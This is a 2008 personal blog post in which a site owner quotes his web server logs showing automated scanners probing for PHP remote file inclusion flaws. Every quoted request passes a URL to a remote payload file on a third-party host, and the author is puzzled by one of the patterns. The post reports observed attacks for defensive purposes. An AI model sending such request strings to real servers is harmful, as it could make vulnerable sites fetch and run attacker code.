Browsing through the web logs looking fo ... / 2008-08-26

Koos van den Hout

2008-08-26 Browsing through the web logs looking fo ...
Attention: this item is more than 5 years old, links can be broken and information can have been updated.
Browsing through the web logs looking for any problems shows heaps of IPs trying to find vulnerable php scripts to break into using an approach of constructing lots of urls with the vulnerable script and the right parameters at the end. Sometimes scans from one IP mingling with scans from another IP. Samples: 
193.207.106.54 - - [26/Aug/2008:13:18:39 +0200] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=<a href="=http://www.ganzkoerperpflege.at/files/oye.txt">http://www.ganzkoerperpflege.at/files/oye.txt</a>?? HTTP/1.1" 200 3155 "-" "libwww-perl/5.79"
193.207.106.54 - - [26/Aug/2008:13:18:39 +0200] "GET /~koos/newstag.cgi//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.ganzkoerperpflege.at/files/oye.txt?? HTTP/1.1" 404 5 "-" "libwww-perl/5.79"
193.207.106.54 - - [26/Aug/2008:13:18:40 +0200] "GET /~koos/newstag.cgi/security//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.ganzkoerperpflege.at/files/oye.txt?? HTTP/1.1" 404 5 "-" "libwww-perl/5.79"
74.55.98.10 - - [26/Aug/2008:15:53:50 +0200] "GET /~koos/newsitem.cgi//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=<a href="http://visitingphysicians.com/hrjobs_contacts/r.txt">http://visitingphysicians.com/hrjobs_contacts/r.txt</a>?? HTTP/1.1" 404 5 "-" "libwww-perl/5.813"
74.55.98.10 - - [26/Aug/2008:15:53:51 +0200] "GET /~koos/newsitem.cgi//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://visitingphysicians.com/hrjobs_contacts/r.txt?? HTTP/1.1" 404 5 "-" "libwww-perl/5.813"
74.55.98.10 - - [26/Aug/2008:15:53:51 +0200] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://visitingphysicians.com/hrjobs_contacts/r.txt?? HTTP/1.1" 200 3155 "-" "libwww-perl/5.813"
193.142.215.12 - - [26/Aug/2008:21:46:07 +0200] "GET /~koos/error.php?dir=<a href="http://starthost.us/pemlk/dark/safe.txt">http:/www.starthost.us/pemlk/darl/safe.txt</a>?? HTTP/1.1" 404 901 "-" "libwww-perl/5.808"
The one that puzzles me because I see a lot of it and can't find the associated vulnerability: 
62.40.154.234 - - [26/Aug/2008:10:47:56 +0200] "GET /~koos/newstag.cgi/spam/english.php?u=<a href="http://javva.com/id.txt">http://javva.com/id.txt</a>? HTTP/1.1" 404 5 "-" "libwww-perl/5.79"
62.40.154.234 - - [26/Aug/2008:10:47:56 +0200] "GET /english.php?u=http://javva.com/id.txt? HTTP/1.1" 404 901 "-" "libwww-perl/5.79"
62.40.154.234 - - [26/Aug/2008:10:47:56 +0200] "GET /~koos/newstag.cgi/english.php?u=http://javva.com/id.txt? HTTP/1.1" 404 5 "-" "libwww-perl/5.79"
Not an advertisment for php, this.
Tags: , , ,

IPv6 check

Running test...

Archive

Browse the recent archive:
September 2023
August 2023
July 2023
June 2023
May 2023
April 2023
March 2023
February 2023
January 2023
December 2022
November 2022
October 2022
News archive
, reachable as koos+website@idefix.net. PGP encrypted e-mail preferred. PGP key 5BA9 368B E6F3 34E4 local copy PGP key 5BA9 368B E6F3 34E4 via keyservers

RSS
Meningen zijn die van mezelf, wat ik schrijf is beschermd door auteursrecht. Sommige publicaties bevatten een expliciete vermelding dat ze ongevraagd gedeeld mogen worden.
My opinions are my own, what I write is protected by copyrights. Some publications contain an explicit license statement which allows sharing without asking permission.
Other webprojects: Camp Wireless, wireless Internet access at campsites
This page generated by $Id: newsitem.cgi,v 1.62 2023/09/19 14:49:50 koos Exp $ in 0.008836 seconds.